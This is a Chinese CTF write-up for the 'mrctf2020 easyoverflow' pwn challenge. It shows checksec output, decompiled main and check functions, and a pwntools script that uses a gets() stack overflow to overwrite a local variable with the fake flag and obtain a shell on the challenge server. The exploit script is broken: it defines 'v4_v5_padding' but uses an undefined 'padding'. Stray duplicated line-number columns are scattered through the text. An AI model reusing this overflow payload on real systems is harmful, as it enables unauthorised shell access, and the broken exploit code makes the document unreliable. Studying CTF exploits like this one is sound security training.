mrctf2020 easyoverflow
# mrctf2020 easyoverflow
# 前提
# 查看文件保护
[*] '/root/pwn/buuctf/mrctf2020_easyoverflow/mrctf2020_easyoverflow'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
1
2
3
4
5
6
2
3
4
5
6
# 静态分析
主函数如下:
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [rsp+0h] [rbp-70h]
__int64 v5; // [rsp+30h] [rbp-40h]
__int64 v6; // [rsp+38h] [rbp-38h]
__int64 v7; // [rsp+40h] [rbp-30h]
__int64 v8; // [rsp+48h] [rbp-28h]
__int64 v9; // [rsp+50h] [rbp-20h]
__int64 v10; // [rsp+58h] [rbp-18h]
__int16 v11; // [rsp+60h] [rbp-10h]
unsigned __int64 v12; // [rsp+68h] [rbp-8h]
v12 = __readfsqword(0x28u);
v5 = 7376685493371762026LL;
v6 = 7440000900169689920LL;
v7 = 0LL;
v8 = 0LL;
v9 = 0LL;
v10 = 0LL;
v11 = 0;
gets(&v4, argv);
if ( !(unsigned int)check((__int64)&v5) )
exit(0);
system("/bin/sh");
return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
check函数如下:
signed __int64 __fastcall check(__int64 a1)
{
int i; // [rsp+18h] [rbp-8h]
int v3; // [rsp+1Ch] [rbp-4h]
v3 = strlen(fake_flag);
for ( i = 0; ; ++i )
{
if ( i == v3 )
return 1LL;
if ( *(_BYTE *)(i + a1) != fake_flag[i] )
break;
}
return 0LL;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 思路分析
目前信息:
main函数存在溢出点check检查若v5!=fake_flag则程序退出- Canary found
- NX enabled
- PIE enabled
思路:
- 输入点在
v4,用v4溢出修改v5为fake_flag的值就可获得shell
- 输入点在
# exp
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/mrctf2020_easyoverflow/mrctf2020_easyoverflow'
io = remote('node4.buuoj.cn', 25009)
# io = process(pwnfile)
elf = ELF(pwnfile)
v4_v5_padding = 0x30
payload = flat(['a'*padding, 'n0t_r3@11y_f1@g'])
io.sendline(payload)
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
2
3
4
5
6
7
8
9
10
11
上次更新: 2022/08/15, 00:29:49